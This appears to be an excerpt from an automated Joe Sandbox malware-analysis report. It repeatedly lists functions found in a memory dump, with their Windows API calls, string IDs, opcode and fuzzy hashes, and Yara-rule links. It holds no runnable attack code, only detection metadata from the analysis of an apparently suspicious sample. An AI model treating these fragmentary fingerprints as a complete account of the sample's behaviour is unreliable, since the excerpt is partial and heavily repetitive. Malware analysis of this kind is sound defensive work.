                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                                                                                        • String ID: |
                                                                                                                                                                        • API String ID: 596671847-2343686810
                                                                                                                                                                        • Opcode ID: 61fd4ef73d68e3cec7ace38e78b8592cbd69ec1e64aa9bcad8c64834b322c9f2
                                                                                                                                                                        • Instruction ID: b086426c2fd8dcc675b3f2903e59c67d457ed5024645e6eda58d839bd0fb49cb
                                                                                                                                                                        • Opcode Fuzzy Hash: 61fd4ef73d68e3cec7ace38e78b8592cbd69ec1e64aa9bcad8c64834b322c9f2
                                                                                                                                                                        • Instruction Fuzzy Hash: 41314F71821119ABCF15EFA4CC85EEEBFB9FF44304F10012AF815A6266EB719966CF50
                                                                                                                                                                        Function 002F4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 002F40BD
                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002F40F8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                                                        • String ID: static
                                                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                                                        • Opcode ID: 40d037ab88ef8b4fedbe7187aeae06d6a105b93bfa320de1ccdb7ebee95fefa1
                                                                                                                                                                        • Instruction ID: c0bf4075791a035a1546438207bf25d7eb235d43c482517116287170959b8858
                                                                                                                                                                        • Opcode Fuzzy Hash: 40d037ab88ef8b4fedbe7187aeae06d6a105b93bfa320de1ccdb7ebee95fefa1
                                                                                                                                                                        • Instruction Fuzzy Hash: 14319471120608AADB14DF74DC40FFBB3A9FF48764F00862DFA5587190DA71AC91DB60
                                                                                                                                                                        Function 002F4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002F50BD
                                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002F50D2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID: '
                                                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                                                        • Opcode ID: 18ee34266af625be87706a1381b4c2e7f29ba347adf2d6a9b8a9e1031f56442c
                                                                                                                                                                        • Instruction ID: 72ca99f64ac566810d4576a780bea30d73b5a94977fc4aaa82c98d146814c8f8
                                                                                                                                                                        • Opcode Fuzzy Hash: 18ee34266af625be87706a1381b4c2e7f29ba347adf2d6a9b8a9e1031f56442c
                                                                                                                                                                        • Instruction Fuzzy Hash: D8313874A1061A9FDB14CF69C980BEABBB5FF49340F10407EEA04AB351DB71A955CF90
                                                                                                                                                                        Function 002620B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                          • Part of subcall function 00262234: GetWindowLongW.USER32(?,000000EB), ref: 00262242
                                                                                                                                                                        • GetParent.USER32(?), ref: 002A3440
                                                                                                                                                                        • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 002A34CA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LongWindow$ParentProc
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 2181805148-113007392
                                                                                                                                                                        • Opcode ID: 072ecbeca848d99ef1813b80a56d42d0bbbf1e5584134e15852983769ba318a0
                                                                                                                                                                        • Instruction ID: b01e71312fd54c3f7506f95e0474946f103b471788441b40087649fe31904a19
                                                                                                                                                                        • Opcode Fuzzy Hash: 072ecbeca848d99ef1813b80a56d42d0bbbf1e5584134e15852983769ba318a0
                                                                                                                                                                        • Instruction Fuzzy Hash: CB21A231611555EFCB26DF28C849DA53B66EF0B360F140294F6294B2E2C7318EB9DB10
                                                                                                                                                                        Function 002F41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00267873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002678B1
                                                                                                                                                                          • Part of subcall function 00267873: GetStockObject.GDI32(00000011), ref: 002678C5
                                                                                                                                                                          • Part of subcall function 00267873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002678CF
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 002F4216
                                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 002F4230
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                        • String ID: static
                                                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                                                        • Opcode ID: e58877be56a3d514af7a50f5d072abf9fe429e9857d88b94ddf52cfafab38e36
                                                                                                                                                                        • Instruction ID: 96179a173f29d64050666224ba99494cca49cfc0b525189063c360eec5e88f12
                                                                                                                                                                        • Opcode Fuzzy Hash: e58877be56a3d514af7a50f5d072abf9fe429e9857d88b94ddf52cfafab38e36
                                                                                                                                                                        • Instruction Fuzzy Hash: C511267262020AAFDB01DFA8DC45AFEBBA8EB08354F014925FE55E3250D774E861DB60
                                                                                                                                                                        Function 002DD763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002DD7C2
                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002DD7EB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                                                        • String ID: <local>
                                                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                                                        • Opcode ID: e6d8f15e84f8526f685ca488806e8e641be09cc406f1802ae8d58364b6b60155
                                                                                                                                                                        • Instruction ID: 3a3092df8344ba1c682458de08627803655b254139f462cfbc8bb6ced0749903
                                                                                                                                                                        • Opcode Fuzzy Hash: e6d8f15e84f8526f685ca488806e8e641be09cc406f1802ae8d58364b6b60155
                                                                                                                                                                        • Instruction Fuzzy Hash: BC112571261A32BAE7344F668C49EF7FE9DEF127A4F00426BF50983280D2A09C50C2F0
                                                                                                                                                                        Function 002C75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 002C761D
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002C7629
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                        • String ID: STOP
                                                                                                                                                                        • API String ID: 1256254125-2411985666
                                                                                                                                                                        • Opcode ID: 98c2fba4cb40290da5e5fadea4355060d119baa8eb47e83e99a1a998962562a3
                                                                                                                                                                        • Instruction ID: 9441639c7f1ddd8c89b0bd656def895108702469acd764d311c35b2fe3e9168d
                                                                                                                                                                        • Opcode Fuzzy Hash: 98c2fba4cb40290da5e5fadea4355060d119baa8eb47e83e99a1a998962562a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 15010432A349278BCB11AEBCDC40EBF73BDBF60354B200629E421D2291EB30D860CE40
                                                                                                                                                                        Function 002C262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
                                                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002C2699
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                        • Opcode ID: f7fd97aee90d03fcdbd3d96581ade656ab578728944c1c5733af5dcce3c2162d
                                                                                                                                                                        • Instruction ID: 6d30e07abddc8a83dc873b871b04ec1bbcd88a1f736b7d2dc70a53583e32f9ef
                                                                                                                                                                        • Opcode Fuzzy Hash: f7fd97aee90d03fcdbd3d96581ade656ab578728944c1c5733af5dcce3c2162d
                                                                                                                                                                        • Instruction Fuzzy Hash: CF01DE35A60225EB8B05BBA0CC51EFE7368EF46360B50071DA822972C1DF3158AC8A60
                                                                                                                                                                        Function 002C2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
                                                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 002C2593
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                        • Opcode ID: 7af814e81b0c99181363fd41516af4f025f8a4a804a8a1f61686726687de8757
                                                                                                                                                                        • Instruction ID: 0c339fe62cea8744d8a09188207d59b4646ce3aa42fa8eb76842d0736a98de09
                                                                                                                                                                        • Opcode Fuzzy Hash: 7af814e81b0c99181363fd41516af4f025f8a4a804a8a1f61686726687de8757
                                                                                                                                                                        • Instruction Fuzzy Hash: FB01AC75A60105EBCB09FB54C962FFF77A8DF55780F90022DB802A7281DE519E6CCAB1
                                                                                                                                                                        Function 002C25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
                                                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 002C2615
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                        • Opcode ID: 5dc6ca0cef4d5c1179c7336aaf86203afce3cf8f78a88812b4b4919dedcd4b5d
                                                                                                                                                                        • Instruction ID: c25b3c9161b7fee06e386a862180fccc0464537849474616f9ff61dcca9fe7dc
                                                                                                                                                                        • Opcode Fuzzy Hash: 5dc6ca0cef4d5c1179c7336aaf86203afce3cf8f78a88812b4b4919dedcd4b5d
                                                                                                                                                                        • Instruction Fuzzy Hash: 0901F775A20105A6CB06FB50D952FFF73ACCF15380F500229B802E3281DE618E6CCAB1
                                                                                                                                                                        Function 002C26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
                                                                                                                                                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 002C2720
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                        • Opcode ID: 9bdf38547e448f726861a90a6ee9b96516be9e4574ae331a062d36d8486ad665
                                                                                                                                                                        • Instruction ID: c027cdf2c5d532dd046dfe65cf97c475469d87d63bf79e82ac542a4c35599769
                                                                                                                                                                        • Opcode Fuzzy Hash: 9bdf38547e448f726861a90a6ee9b96516be9e4574ae331a062d36d8486ad665
                                                                                                                                                                        • Instruction Fuzzy Hash: 68F08675A60115A6DB05B7649C92FFEB768EF05790F400A19B422A72C1DE61586C8660
                                                                                                                                                                        Function 002F9AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 002F9B6D
                                                                                                                                                                          • Part of subcall function 00262234: GetWindowLongW.USER32(?,000000EB), ref: 00262242
                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 002F9B53
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LongWindow$MessageProcSend
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 982171247-113007392
                                                                                                                                                                        • Opcode ID: 5b070508210ee4a709bc8b8d92ecb7a42a3f2f8b0f39946e0e0d9cf372899efe
                                                                                                                                                                        • Instruction ID: 2fc82f857b3cd33bb7f87479dda8a0273c1674dfd71a30c8bdc49363c7573074
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b070508210ee4a709bc8b8d92ecb7a42a3f2f8b0f39946e0e0d9cf372899efe
                                                                                                                                                                        • Instruction Fuzzy Hash: 0101D43011121CEFCB259F14EC88F76BB66FB853A8F100578FA021A1F0C77268A5DB51
                                                                                                                                                                        Function 00293A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 2<)$j30
                                                                                                                                                                        • API String ID: 0-2774254245
                                                                                                                                                                        • Opcode ID: a36a3bf9414bbaf3c4a66f0af0b55eca5b3cb1506326ee1a5b108684d3b1db9b
                                                                                                                                                                        • Instruction ID: c0140edae583d86daaec41065948aab6b874d2388849229100630322a1d192a9
                                                                                                                                                                        • Opcode Fuzzy Hash: a36a3bf9414bbaf3c4a66f0af0b55eca5b3cb1506326ee1a5b108684d3b1db9b
                                                                                                                                                                        • Instruction Fuzzy Hash: D8F0B435524149AADF14DF91C850AF973F8DF04710F10406ABDCAC7690EBB48FA1D365
                                                                                                                                                                        Function 002F8432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 002F8471
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 002F847F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LongWindow
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 1378638983-113007392
                                                                                                                                                                        • Opcode ID: 208dc8f2510e5c5a407bd5679366a66a7031cac6abe664ca624949dfffbb3915
                                                                                                                                                                        • Instruction ID: afef266e39e670baa4bf22121d820762f9c92d9111c9f512e6b2691c7b2760d8
                                                                                                                                                                        • Opcode Fuzzy Hash: 208dc8f2510e5c5a407bd5679366a66a7031cac6abe664ca624949dfffbb3915
                                                                                                                                                                        • Instruction Fuzzy Hash: FDF03C352112459FC705DF68EC44E7AB7A9FB86360F114629FA268B3B0CB309860DB10
                                                                                                                                                                        Function 002C1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
